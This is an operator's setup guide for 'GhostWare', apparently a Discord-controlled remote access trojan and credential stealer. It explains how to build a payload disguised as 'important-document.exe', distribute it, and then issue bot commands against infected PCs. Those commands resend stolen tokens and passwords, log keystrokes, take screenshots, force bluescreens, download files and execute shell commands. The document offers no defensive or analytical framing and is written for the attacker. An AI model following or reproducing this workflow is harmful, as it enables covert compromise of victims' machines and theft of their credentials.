═══════════════════════════════════════════════════════════════════
    🎮 GHOSTWARE v1.1.0 - DISCORD BOT REMOTE CONTROL SETUP 🎮
═══════════════════════════════════════════════════════════════════

📦 INSTALLER LOCATION:
   downloads/GhostWare-Setup-1.1.0.exe (77.86 MB)

═══════════════════════════════════════════════════════════════════
📋 STEP-BY-STEP SETUP GUIDE
═══════════════════════════════════════════════════════════════════

1️⃣ CREATE DISCORD BOT
   • Go to: https://discord.com/developers/applications
   • Click "New Application"
   • Name it: GhostWare (or anything you want)
   • Go to "Bot" tab → Click "Add Bot"
   • Copy the BOT TOKEN (you'll need this!)
   
   ⚠️ IMPORTANT: Enable these settings in Bot tab:
   • ✅ MESSAGE CONTENT INTENT (Required!)
   • ✅ Presence Intent
   • ✅ Server Members Intent

2️⃣ INVITE BOT TO YOUR SERVER
   • Go to "OAuth2" → "URL Generator"
   • Select Scopes:
     ✅ bot
   • Select Bot Permissions:
     ✅ Send Messages
     ✅ Embed Links
     ✅ Attach Files
     ✅ Read Message History
     ✅ Add Reactions
   • Copy the generated URL
   • Open it in browser → Select your server → Authorize

3️⃣ CREATE DISCORD WEBHOOK (for payload notifications)
   • Open your Discord server
   • Right-click a channel → Edit Channel
   • Go to "Integrations" → "Webhooks"
   • Click "New Webhook"
   • Copy the WEBHOOK URL

4️⃣ INSTALL & RUN GHOSTWARE
   • Run: downloads/GhostWare-Setup-1.1.0.exe
   • Follow installer (installs to: C:\Users\YourName\AppData\Local\Programs\GhostWare)
   • Launch GhostWare from desktop shortcut

5️⃣ CONFIGURE DISCORD IN GHOSTWARE
   • Open GhostWare app
   • Click "File Builder" tab
   • Enter your WEBHOOK URL
   • Enter your BOT TOKEN
   • Click "Test Bot" (or press Enter)
   • ✅ Bot should connect and send command list to Discord!

6️⃣ BUILD PAYLOAD
   • In File Builder, configure options:
     - Set filename (e.g., "important-document.exe")
     - Set size (default 512 KB)
     - Enable features (startup, screenshot, etc.)
   • Click "Download .exe"
   • Payload saved to Downloads folder!

7️⃣ USE BOT COMMANDS IN DISCORD
   Once a payload is executed on a target PC, use these commands:

   .list
      → Shows all connected machines

   .rs <pcName>
      → Resend all logs (tokens, passwords, system info)
      → Example: .rs DESKTOP-ABC123

   .bs <pcName>
      → Trigger bluescreen on target machine

   .ss <pcName>
      → Capture screenshot from target machine

   .kl <pcName>
      → Start keylogger (60 seconds)

   .msg <pcName> <text>
      → Show message box on target
      → Example: .msg DESKTOP-ABC123 Hello World!

   .url <pcName> <url>
      → Open URL in browser on target
      → Example: .url LAPTOP https://example.com

   .dl <pcName> <url>
      → Download file from URL to target
      → Example: .dl LAPTOP https://site.com/file.exe

   .exec <pcName> <command>
      → Execute shell command on target
      → Example: .exec DESKTOP-ABC123 ipconfig /all

   💡 TIP: Commands use partial PC name matching (case-insensitive)
       .ss DESK → matches "DESKTOP-JOHN-PC"
       .rs LAPTOP → matches "LAPTOP-HOME"

═══════════════════════════════════════════════════════════════════
🎯 WHAT'S NEW IN v1.1.0
═══════════════════════════════════════════════════════════════════

✅ Discord Bot Integration
   • Full remote control via Discord commands
   • No need to keep app open - bot runs independently
   • Rich embed responses with system info

✅ 9 Bot Commands
   • .list - List all machines
   • .rs - Resend logs
   • .bs - Bluescreen
   • .ss - Screenshot
   • .kl - Keylogger
   • .msg - Message box
   • .url - Open URL
   • .dl - Download file
   • .exec - Execute command

✅ Automatic Branding
   • Bot uses GhostWare logo as avatar
   • Bot username set to "GhostWare"
   • Webhook branded automatically

✅ Command List Auto-Send
   • Bot sends command guide when it connects
   • No need to remember commands

✅ Token Persistence
   • Bot token saved locally
   • Auto-reconnects on app restart

═══════════════════════════════════════════════════════════════════
🔒 SECURITY NOTES
═══════════════════════════════════════════════════════════════════

• Bot token stored locally at: 
  C:\Users\YourName\.ghostware\bot_token.txt

• Connections saved at:
  C:\Users\YourName\.ghostware\connections_*.json

• Keep your bot token secret! Anyone with the token can control your bot

• Use a private Discord server for bot commands

• Bot requires "Message Content Intent" to read commands

═══════════════════════════════════════════════════════════════════
📁 FILE LOCATIONS
═══════════════════════════════════════════════════════════════════

GhostWare App:
   C:\Users\YourName\AppData\Local\Programs\GhostWare\

Payload EXEs:
   C:\Users\YourName\Downloads\
   (Built by the app, named as you specify)

Bot Data:
   C:\Users\YourName\.ghostware\
   • bot_token.txt
   • connections_*.json
   • tokens_*.json
   • relay_topic.txt

═══════════════════════════════════════════════════════════════════
❓ TROUBLESHOOTING
═══════════════════════════════════════════════════════════════════

❌ Bot doesn't connect:
   • Check bot token is correct
   • Enable "Message Content Intent" in Discord Developer Portal
   • Make sure bot is in a server

❌ Bot doesn't respond to commands:
   • Commands must start with "." (dot)
   • Bot needs "Send Messages" permission
   • Check bot is online (green status)

❌ Commands say "No machine found":
   • Check exact PC name with .list command
   • Use partial name matching (e.g., .rs DESK for DESKTOP-ABC)
   • Make sure payload was executed on that machine

❌ Payload not building:
   • .NET Framework 4.0+ required (comes with Windows 10/11)
   • Check C# compiler at: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

═══════════════════════════════════════════════════════════════════
🚀 QUICK START
═══════════════════════════════════════════════════════════════════

1. Run: downloads/GhostWare-Setup-1.1.0.exe
2. Create Discord bot at: https://discord.com/developers/applications
3. Enable "Message Content Intent"
4. Invite bot to your server
5. Open GhostWare → File Builder
6. Enter webhook URL and bot token
7. Click "Test Bot"
8. Build payload with "Download .exe"
9. Distribute payload
10. Use commands in Discord!

═══════════════════════════════════════════════════════════════════

🎉 You're ready to go! Build payloads and control via Discord! 🎉

═══════════════════════════════════════════════════════════════════
